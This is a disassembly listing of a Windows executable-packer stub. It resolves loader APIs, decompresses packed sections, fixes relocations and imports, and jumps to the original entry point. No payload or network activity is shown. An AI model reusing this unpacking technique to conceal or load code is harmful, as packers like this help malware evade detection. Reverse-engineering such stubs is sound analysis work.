dd 7E028h, 7E035h, 5 dup(0)
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 0E805D800h, 0E7A5FD77h
dd 77h, 4C000000h, 4C64616Fh, 61726269h, 417972h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 2 dup(0)
dd 47E07900h, 47E07D00h, 5 dup(0)
db 0, 90h
; ---------------------------------------------------------------------------
public start
start:
call sub_47E1B0
add [eax], dl
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 200h, 2B0h, 6 dup(0)
dd 0D7000000h, 880001E9h, 0A8h, 38h, 1Ah dup(0)
dd 56000000h, 75747269h, 6C416C61h, 636F6Ch, 61427349h
dd 61655264h, 72745064h, 0E7980A00h, 0E7339C77h, 0E6000077h
dd 77h, 0
dd 40000000h, 0
dd 29DB400h, 0AB000000h, 1611971h, 0
dd 72695600h, 6C617574h, 746F7250h, 746365h, 77E6169Ah
dd 4, 1, 2 dup(0)
dd 12FFC4h, 0
dd 7FFDF000h, 12FFB0h, 7FFE0304h, 77F5180Bh, 77F52E0Fh
; =============== S U B R O U T I N E =======================================
sub_47E1B0 proc near ; CODE XREF: fuck:start�p
call $+5
pop ebp
sub ebp, 4011B5h
mov [ebp+401198h], eax
mov [ebp+40119Ch], ebx
mov [ebp+4011A0h], ecx
mov dword ptr ss:loc_4011A4[ebp], edx
mov [ebp+4011A8h], esi
mov [ebp+4011ACh], edi
cmp dword ptr [ebp+401188h], 0
jz short loc_47E214
mov esp, [ebp+401194h]
mov eax, [ebp+401198h]
mov ebx, [ebp+40119Ch]
mov ecx, [ebp+4011A0h]
mov edx, dword ptr ss:loc_4011A4[ebp]
mov esi, [ebp+4011A8h]
mov edi, [ebp+4011ACh]
retn
; ---------------------------------------------------------------------------
loc_47E214: ; CODE XREF: sub_47E1B0+37�j
mov [ebp+401194h], esp
add dword ptr [ebp+401194h], 4
mov dword ptr [ebp+401188h], 1
lea eax, [ebp+401028h]
push eax
call dword ptr ss:loc_401035[ebp]
mov [ebp+40114Dh], eax
lea ebx, loc_40112B[ebp]
push ebx
push eax
call dword ptr [ebp+401039h]
mov [ebp+401145h], eax
lea ebx, [ebp+401138h]
push ebx
push dword ptr [ebp+40114Dh]
call dword ptr [ebp+401039h]
mov [ebp+401149h], eax
lea ebx, [ebp+401171h]
push ebx
push dword ptr [ebp+40114Dh]
call dword ptr [ebp+401039h]
mov [ebp+401180h], eax
call $+5
pop edx
loc_47E28A: ; CODE XREF: sub_47E1B0+E2�j
; sub_47E1B0+104�j ...
cmp word ptr [edx], 5A4Dh
jz short loc_47E294
dec edx
jmp short loc_47E28A
; ---------------------------------------------------------------------------
loc_47E294: ; CODE XREF: sub_47E1B0+DF�j
movzx ecx, word ptr [edx+3Ch]
add ecx, edx
push edx
push ecx
push 4
push ecx
call dword ptr [ebp+401149h]
pop ecx
pop edx
or eax, eax
jnz short loc_47E2B3
cmp dword ptr [ecx], 4550h
jz short loc_47E2B6
loc_47E2B3: ; CODE XREF: sub_47E1B0+F9�j
dec edx
jmp short loc_47E28A
; ---------------------------------------------------------------------------
loc_47E2B6: ; CODE XREF: sub_47E1B0+101�j
cmp dword ptr [ecx+70h], 3DCh
jz short loc_47E2C2
dec edx
jmp short loc_47E28A
; ---------------------------------------------------------------------------
loc_47E2C2: ; CODE XREF: sub_47E1B0+10D�j
mov dword ptr ss:loc_401159[ebp], edx
push ecx
lea eax, [ebp+401184h]
push eax
push 4
push 1000h
push ecx
call dword ptr [ebp+401180h]
pop ecx
mov eax, dword ptr ss:loc_40118C[ebp]
mov [ecx+78h], eax
mov eax, [ebp+401190h]
mov [ecx+7Ch], eax
push ecx
mov ecx, 0Ah
xor edx, edx
loc_47E2F9: ; CODE XREF: sub_47E1B0+16B�j
lea esi, [ebp+4010DBh]
add esi, edx
lodsd
test eax, eax
jz short loc_47E31D
add eax, dword ptr ss:loc_401159[ebp]
pusha
lea ebx, sub_401000[ebp]
push ebx
call eax
pop eax
popa
add edx, 4
loop loc_47E2F9
loc_47E31D: ; CODE XREF: sub_47E1B0+154�j
pop ecx
push ecx
lea eax, [ebp+401184h]
push eax
push 4
push 1000h
push ecx
call dword ptr [ebp+401180h]
pop ecx
mov eax, [ebp+40116Dh]
mov [ecx+88h], eax
mov dword ptr [ecx+8Ch], 368h
push 40h
push 1000h
push 1000000h
push 0
call dword ptr [ebp+401145h]
mov ebx, eax
add ebx, 200000h
lea esi, [ebp+40108Bh]
lea edi, [ebp+4010B3h]
xor edx, edx
mov ecx, 0Ah
loc_47E37A: ; CODE XREF: sub_47E1B0+1F6�j
lodsd
test eax, eax
jz short loc_47E3A8
add eax, dword ptr ss:loc_401159[ebp]
push eax
push ebx
push eax
call sub_47E545
add esp, 8
pop eax
pusha
lea ecx, [ebp+4010B3h]
add ecx, edx
mov ecx, [ecx]
mov edi, eax
mov esi, ebx
rep movsb
popa
add edx, 4
loop loc_47E37A
loc_47E3A8: ; CODE XREF: sub_47E1B0+1CD�j
cmp dword ptr [ebp+401151h], 0
jz short loc_47E417
mov eax, [ebp+401151h]
mov ebx, dword ptr ss:loc_401159[ebp]
mov esi, ebx
movzx edi, word ptr [esi+3Ch]
add edi, esi
mov edx, [edi+34h]
pusha
sub ebx, edx
mov [ebp+401155h], ebx
popa
cmp edx, ebx
jz short loc_47E417
add ebx, eax
loc_47E3D8: ; CODE XREF: sub_47E1B0+265�j
cmp dword ptr [ebx], 0
jz short loc_47E417
mov eax, [ebx]
mov ecx, [ebx+4]
shr ecx, 1
add ebx, 8
loc_47E3E7: ; CODE XREF: sub_47E1B0+263�j
movzx edi, word ptr [ebx]
mov edx, edi
shr edi, 0Ch
cmp edi, 3
jnz short loc_47E40E
mov edi, edx
and edi, 0FFFh
add edi, eax
add edi, dword ptr ss:loc_401159[ebp]
push eax
mov eax, [ebp+401155h]
add [edi], eax
pop eax
loc_47E40E: ; CODE XREF: sub_47E1B0+242�j
mov edi, edx
add ebx, 2
loop loc_47E3E7
jmp short loc_47E3D8
; ---------------------------------------------------------------------------
loc_47E417: ; CODE XREF: sub_47E1B0+1FF�j
; sub_47E1B0+224�j ...
mov eax, dword ptr ss:loc_40115D[ebp]
or eax, eax
jz short loc_47E432
add eax, dword ptr ss:loc_401159[ebp]
mov edi, dword ptr ss:loc_401079[ebp]
mov esi, [eax+8]
mov [esi], edi
loc_47E432: ; CODE XREF: sub_47E1B0+26F�j
mov esi, [ebp+401161h]
add esi, dword ptr ss:loc_401159[ebp]
sub esi, 14h
loc_47E441: ; CODE XREF: sub_47E1B0+2E3�j
add esi, 14h
cmp dword ptr [esi+10h], 0
jz loc_47E4DE
mov ebx, [esi+0Ch]
add ebx, dword ptr ss:loc_401159[ebp]
push esi
push ebx
call dword ptr ss:loc_401035[ebp]
pop esi
mov dword ptr ss:loc_401165[ebp], eax
cmp dword ptr [esi], 0
jz short loc_47E47E
mov edi, [esi]
add edi, dword ptr ss:loc_401159[ebp]
mov ecx, [esi+10h]
add ecx, dword ptr ss:loc_401159[ebp]
jmp short loc_47E490
; ---------------------------------------------------------------------------
loc_47E47E: ; CODE XREF: sub_47E1B0+2B9�j
mov edi, [esi+10h]
add edi, dword ptr ss:loc_401159[ebp]
mov ecx, [esi+10h]
add ecx, dword ptr ss:loc_401159[ebp]
loc_47E490: ; CODE XREF: sub_47E1B0+2CC�j
; sub_47E1B0+32C�j
cmp dword ptr [edi], 0
jz short loc_47E441
mov ebx, [edi]
bt ebx, 1Fh
jb short loc_47E4BD
add ebx, dword ptr ss:loc_401159[ebp]
add ebx, 2
push ecx
push edi
push ebx
push dword ptr ss:loc_401165[ebp]
call dword ptr [ebp+401039h]
pop edi
pop ecx
mov [edi], eax
mov [ecx], eax
jmp short loc_47E4D6
; ---------------------------------------------------------------------------
loc_47E4BD: ; CODE XREF: sub_47E1B0+2EB�j
shl ebx, 1
shr ebx, 1
push ecx
push edi
push ebx
push dword ptr ss:loc_401165[ebp]
call dword ptr [ebp+401039h]
pop edi
pop ecx
mov [edi], eax
mov [ecx], eax
loc_47E4D6: ; CODE XREF: sub_47E1B0+30B�j
add edi, 4
add ecx, 4
jmp short loc_47E490
; ---------------------------------------------------------------------------
loc_47E4DE: ; CODE XREF: sub_47E1B0+298�j
mov ecx, 0Ah
xor edx, edx
loc_47E4E5: ; CODE XREF: sub_47E1B0+357�j
lea esi, [ebp+401103h]
add esi, edx
lodsd
test eax, eax
jz short loc_47E509
add eax, dword ptr ss:loc_401159[ebp]
pusha
lea ebx, sub_401000[ebp]
push ebx
call eax
pop eax
popa
add edx, 4
loop loc_47E4E5
loc_47E509: ; CODE XREF: sub_47E1B0+340�j
mov esp, [ebp+401194h]
mov eax, [ebp+401198h]
mov ebx, [ebp+40119Ch]
mov ecx, [ebp+4011A0h]
mov edx, dword ptr ss:loc_4011A4[ebp]
mov esi, [ebp+4011A8h]
mov edi, [ebp+4011ACh]
mov edx, [ebp+401169h]
add edx, dword ptr ss:loc_401159[ebp]
jmp edx
sub_47E1B0 endp
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; =============== S U B R O U T I N E =======================================
sub_47E545 proc near ; CODE XREF: sub_47E1B0+1D8�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0047E5E4 SIZE 0000000A BYTES
pusha
mov esi, [esp+20h+arg_0]
mov edi, [esp+20h+arg_4]
cld
mov dl, 80h
xor ebx, ebx
loc_47E553: ; CODE XREF: sub_47E545+16�j
movsb
mov bl, 2
loc_47E556: ; CODE XREF: sub_47E545+3B�j
; sub_47E545+81�j
call sub_47E5C8
jnb short loc_47E553
xor ecx, ecx
call sub_47E5C8
jnb short loc_47E582
xor eax, eax
call sub_47E5C8
jnb short loc_47E592
mov bl, 2
inc ecx
mov al, 10h
loc_47E574: ; CODE XREF: sub_47E545+36�j
call sub_47E5C8
adc al, al
jnb short loc_47E574
jnz short loc_47E5BE
stosb
jmp short loc_47E556
; ---------------------------------------------------------------------------
loc_47E582: ; CODE XREF: sub_47E545+1F�j
call sub_47E5D4
sub ecx, ebx
jnz short loc_47E59B
call sub_47E5D2
jmp short loc_47E5BA
; ---------------------------------------------------------------------------
loc_47E592: ; CODE XREF: sub_47E545+28�j
lodsb
shr eax, 1
jz short loc_47E5E4
adc ecx, ecx
jmp short loc_47E5B7
; ---------------------------------------------------------------------------
loc_47E59B: ; CODE XREF: sub_47E545+44�j
xchg eax, ecx
dec eax
shl eax, 8
lodsb
call sub_47E5D2
cmp eax, 7D00h
jnb short loc_47E5B7
cmp ah, 5
jnb short loc_47E5B8
cmp eax, 7Fh
ja short loc_47E5B9
loc_47E5B7: ; CODE XREF: sub_47E545+54�j
; sub_47E545+66�j
inc ecx
loc_47E5B8: ; CODE XREF: sub_47E545+6B�j
inc ecx
loc_47E5B9: ; CODE XREF: sub_47E545+70�j
xchg eax, ebp
loc_47E5BA: ; CODE XREF: sub_47E545+4B�j
mov eax, ebp
mov bl, 1
loc_47E5BE: ; CODE XREF: sub_47E545+38�j
push esi
mov esi, edi
sub esi, eax
rep movsb
pop esi
jmp short loc_47E556
sub_47E545 endp
; =============== S U B R O U T I N E =======================================
sub_47E5C8 proc near ; CODE XREF: sub_47E545:loc_47E556�p
; sub_47E545+1A�p ...
add dl, dl
jnz short locret_47E5D1
mov dl, [esi]
inc esi
adc dl, dl
locret_47E5D1: ; CODE XREF: sub_47E5C8+2�j
retn
sub_47E5C8 endp
; =============== S U B R O U T I N E =======================================
sub_47E5D2 proc near ; CODE XREF: sub_47E545+46�p
; sub_47E545+5C�p
xor ecx, ecx
sub_47E5D2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_47E5D4 proc near ; CODE XREF: sub_47E545:loc_47E582�p
inc ecx
loc_47E5D5: ; CODE XREF: sub_47E5D4+D�j
call sub_47E5C8
adc ecx, ecx
call sub_47E5C8
jb short loc_47E5D5
retn
sub_47E5D4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_47E545
loc_47E5E4: ; CODE XREF: sub_47E545+50�j
sub edi, [esp+20h+arg_4]
mov [esp+20h+var_4], edi
popa
retn
; END OF FUNCTION CHUNK FOR sub_47E545
; ---------------------------------------------------------------------------
align 2000h
fuck ends
; Section 5. (virtual address 00080000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00080000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 480000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start